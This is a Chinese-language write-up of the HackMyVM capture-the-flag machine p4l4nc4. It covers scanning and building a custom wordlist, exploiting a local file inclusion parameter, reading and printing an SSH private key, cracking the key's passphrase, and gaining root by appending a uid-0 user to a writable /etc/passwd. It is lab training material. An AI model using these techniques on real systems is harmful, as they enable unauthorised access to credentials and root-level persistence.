当前位置: 首页 > article >正文

【hackmyvm】p4l4nc4靶场

1. 基本信息^toc

这里写目录标题

    • 1. 基本信息^toc
    • 2. 信息收集
      • 2.1. 端口扫描
      • 2.2. 目录扫描
    • 3. 提权

靶机链接 https://hackmyvm.eu/machines/machine.php?vm=p4l4nc4
作者 elpensador
难度 ⭐️⭐️⭐️⭐️⭐️

2. 信息收集

2.1. 端口扫描

┌──(root㉿kali)-[~]
└─# nmap 192.168.56.9 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 03:02 EST
Nmap scan report for 192.168.56.9
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:7E:89:2A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds


2.2. 目录扫描


┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.56.9
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.56.9/_24-12-20_03-03-00.txt

Target: http://192.168.56.9/

[03:03:00] Starting:
D2
[03:03:01] 403 -  277B  - /.html
[03:03:01] 403 -  277B  - /.htm
[03:03:01] 403 -  277B  - /.htpasswds
[03:03:01] 403 -  277B  - /.htpasswd_test
[03:03:01] 403 -  277B  - /.httr-oauth
[03:03:01] 403 -  277B  - /.php
[03:03:03] 403 -  277B  - /.ht_wsr.txt
[03:03:17] 200 -  755B  - /robots.txt


┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# curl http://192.168.56.9/robots.txt
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação Científica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro período de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o símbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antílope como símbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antílopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual

翻译
大黑羚是黑羚的一个亚种,在所有亚种中,它以体型巨大而著称,是非洲最稀有的有蹄类动物之一。这个亚种是安哥拉特有的,仅分布在两个地方:坎甘达拉国家公园和卢安多自然保护区。2002年,安哥拉内战结束后,关于安哥拉许多物种的生存情况知之甚少,实际上当时曾担心大黑羚已经灭绝。2004年1月,由安哥拉天主教大学的科学研究中心领导的一个团队,在佩德罗·瓦兹·平托博士的带领下,首次拍摄到了仅存的一个群体的照片,证实了在经历了内战的艰难时期后,这一物种的存续。

目前,大黑羚被视为安哥拉的国象,成为安哥拉人民的骄傲。作为证明,安哥拉的足球队被称为“黑羚队”,而安哥拉航空公司(TAAG)也将这一羚羊作为其标志。此外,“Palanca”还是安哥拉首都罗安达的一个地区名称。在非洲神话中,像其他羚羊一样,它们象征着活力、速度、美丽和视觉的敏锐。

多半就是要做一个字典

┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# echo "A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação Científica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro período de guerra. Atualmente, a Palanca Negra Gigante é considerada como o símbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antílope como símbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antílopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual" | tr ' -' '\n' >words.txt

但是爆破不出来
根据gpt提示我靶机 名字 p4l4nc4palanca(葡萄牙语中的“羚羊”)的网络变体
我估计这作者就是喜欢用这种变体作为名字
其中比较关键的是 palanca-negra-gigante

生成变体的字典
替换i->1 a->4 e->3 l->1
这里面有一些逗号 我们把逗号也给去掉
因为是linux 还有大小写问题。
把所有大写字母开头的大写字母换成小写添加一份追加到字典
在这里插入图片描述

爆破即可发现目录


┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# gobuster dir -u http://192.168.56.9 -w words.txt -x php,html,txt,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.9
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,zip,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/n3gr4                (Status: 301) [Size: 312] [--> http://192.168.56.9/n3gr4/]
Progress: 1060 / 1065 (99.53%)
===============================================================
Finished
===============================================================

继续爆破这个目录发现一个php文件


┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# gobuster dir -u http://192.168.56.9/n3gr4/ -w words.txt -x php,html,txt,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.9/n3gr4/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/m414nj3.php          (Status: 500) [Size: 0]
/m414nj3.php          (Status: 500) [Size: 0]
Progress: 2125 / 2130 (99.77%)
===============================================================
Finished
===============================================================

访问后发现是空的
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

源代码也是空的

应该是有一个参数
使用 arjun爆破一下

┌    yu@yu   ~    388ms   >>ERROR 
└ $ arjun -u http://192.168.112.96/n3gr4/m414nj3.php
    _
   /_| _ '
  (  |/ /(//) v2.2.6
      _/

 Probing the target for stability
 Analysing HTTP response for anomalies
 Analysing HTTP response for potential parameter names
 Logicforcing the URL endpoint
 parameter detected: page, based on: http code
 Parameters found: page

获取到参数是page
从参数名估计就是一个LFI
先试试
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

成功

获取一下userflag


┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# curl http://192.168.112.96/n3gr4/m414nj3.php?page=/home/p4l4nc4/user.txt
HMV{6cfb952777b95ded50a5be3a4ee9417af7e6dcd1}

尝试使用data为协议包含失败了

但是可以读取了到 m414nj3 用户的 id_rsa

┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# curl http://192.168.112.96/n3gr4/m414nj3.php?page=/home/p4l4nc4/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCvTRnNli
2HLc7wYB9S1mbCAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQCrXZ98DYMr
n/f74/g82lqDkMHkyocXGXn8VaP/N7vD9j5mLSr1uhKGBbxcVm4uGP9k//mmRKlewRl/MZ
nTg0N8MP9vp0O2B9vrwHLz9JekTblv93/VCDpJS78CGkNNOVMRcv2ZB3w7uFm6zxRZxQmH
5HaRNuf795GQSFjybiqmN7Mu78bG/94aQMZZLALYmoyMCYWXGvvHpxRN1dwNsT7If4aNBE
l1HXVrZY1biDOrpJQ7O+eZpD4IKs5/QgKL6w9nBczVcGKkvyms98A5qTa/F43+1CxQE2ng
wPiejJEeJZ0PEkQu3nZTK1k7WpJzVnhpqbHGlwKWbfvMKh27Y2gpAAADwI6Nr+vLoXaEJy
SIRrVjIYFz/C3B17pmpx+lmupFfU6ruVHLE92gweyr9wAd5lxhKX1I6BClhlEoDWkzEBCT
H/4zg2tj84+hzhdVWUy6KaCVbRbuvJYWQNWY4kgfk/3FTnSJFHd+k8CZImN3Xa/9DRVLmg
jytzseFr83bPyOyGSze51kJX4r2ljurDvmcnXfQ4j27zUUmwEKi02VvjLngXbmMnIMDLI3
x/pdFxnyZ0w6wnl/Bg+2gvc54Y2ssMblNMw6HZU4K2TN/c3li3A3hLZsN7QwNIV76X5UeP
dWCOngRsImAmMtyxPKZ0rvYwgDimWunQPy0yJXEPdofL6hrAxFZ6y+jnm+gM7x1fnooSkb
9H5RblfwiOtuTD7bmAu6ApNU0Ul3X2YFPnDLFjo/D0Sj5LcsYDQ+XlTNUwnjHpyMy5VzUz
2vDpiscBd7FpFCHf1lS9bfGMLbhOfdM6TPzpjlOmdRizoVjGCZdXsA4Jg05FpvEFa3KHqM
iJOA9yXhHPROYmOwl5Mu+NTPc+Xbiu7B8TJu/BORoOShhbm7+kQpXM7XHPDKTTnJo+qmsI
Pt9FuQF3wZWIXZ48DmRKJKhB+a9LwuE8ES3wUTVqx/EbAs08V6/uiBYZmorJFSgbPd68AE
xKTK9ObilJKSfS2Ik5/iVIBTUxlAt2foAUpWTlXVNmFfBEhRSk48E8NhcgNqctKWpjKf0R
2gi/Dvpect4LoqKPue5zvN0dNlYSiq/6QK6NqJrJdN7DvsvocL+BcWmmv31erlJOo6A3Zw
CEpmnqVzMTroZSBQv3eEsOFS/+RkJ5ffFRpXGfWPh4Dn/Y++n3wbHNNb97pOd9WV+IlhDV
7btvga8cG9xp3zihOIf308VowcpIp0CSlEqZDBpis5jWY9J3N1+uh3pJHFgqmLxKnqLmzu
u15Kh/+nAV6DTBVxrdhq8HoLAvb7ubAq2ICHALC39X12+J0cLOUMi8UWYawMTFgYnO3ZBD
fb6fZaM9Hr97jREiUEG6vgIcNgn6jtJ3EM3ncxTKe2T8SSYn8pFy9Lqf+lvZ8yo9DkaPl5
ORSVWa+jCKhuClPZY5t8VJC9xXGyz8Wah15Y2pg95nGEub7dgmRlQAIiSxjWsDmaDzIBPo
IkZ5lzxoTvvtL2N1+4ZFprPwUN6y6C6zrXbzQp7Ov0bZc2g9fFiNxu1HvR96rwVNFHbeia
OJEM2NZSUU52PExgYtSXwO5aDy70oKiu0pbifoYOm19hlYwYWOOa6s+oW2FG+aXO8WIeEa
muaZDiXw==
-----END OPENSSH PRIVATE KEY-----

私钥有密码需要爆破

┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# ssh2john id_rsa >hash

┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# john hash --word=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
friendster       (id_rsa)
1g 0:00:00:07 DONE (2024-12-20 04:20) 0.1307g/s 83.66p/s 83.66c/s 83.66C/s evelyn..pebbles
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

获取到密码是 friendster

利用密码即可登录到 p4l4nc4 用户

3. 提权

进来后用 history 查看发现 /etc/passwd有写入权限

直接写一个root级别的用户即可

生成密码hash
p4l4nc4@4ng014:/home$ openssl passwd 123456
$1$kUvDgDel$tUYPu5oiI8CqMSfycayS1.

写入到/etc/passwd
p4l4nc4@4ng014:/home$ echo 'root1:$1$kUvDgDel$tUYPu5oiI8CqMSfycayS1.:0:0:root:/root:/bin/bash' >>/etc/passwd
p4l4nc4@4ng014:/home$ su root1
Password:
root@4ng014:/home# whoami
root

这里简单说一下 root用存储在/etc/passwd里面是 root:x:0:0:root:/root:/bin/bash 其中 x 是表示此用户的密码存储在 /etc/shadow 而不是 /etc/passwd 我们利用这个hash替换掉x即可,然后修改一下用户名


http://www.kler.cn/a/447440.html

相关文章:

  • 智能座舱进阶-应用框架层-Handler分析
  • 简洁IIC协议讲述
  • 游戏AI实现-寻路算法(A*)
  • arm Rk3588 更新固件
  • STM32-笔记5-按键点灯(中断方法)
  • 机动车油耗计算API集成指南
  • 【前端面试】list转树、拍平, 指标,
  • 堆排序【东北大学oj数据结构9-4】C++
  • ELK系列-(六)Redis也能作为消息队列?(下)
  • 用Python设置Excel工作表的页眉和页脚
  • Python解决安装包报错4.0.0-unsupported
  • 使用支持向量机(SVM)实现二分类
  • 数据倾斜的原因以及解决方法
  • SQL注入(SQL lnjection Base)21
  • 数据结构_平衡二叉树
  • 前端面试题整理-前端异步编程
  • 【Token】校验、会话技术、登录请求、拦截器【期末实训】实战项目学生和班级管理系统\Day15-后端Web实战(登录认证)\讲义
  • ip_forward函数
  • gesp(二级)(7)洛谷:B3865:[GESP202309 二级] 小杨的 X 字矩阵
  • STM32-笔记7-继电器定时开闭
  • 雅思真题短语梳理(八)
  • 常用的JVM启动参数有哪些?
  • 电子发票汇总改名,批量处理电子发票问题
  • ChatGPT接口测试用例生成的流程
  • windows安装Elasticsearch及增删改查操作
  • 基于SpringBoot+Mysql实现的在线音乐系统平台功能实现一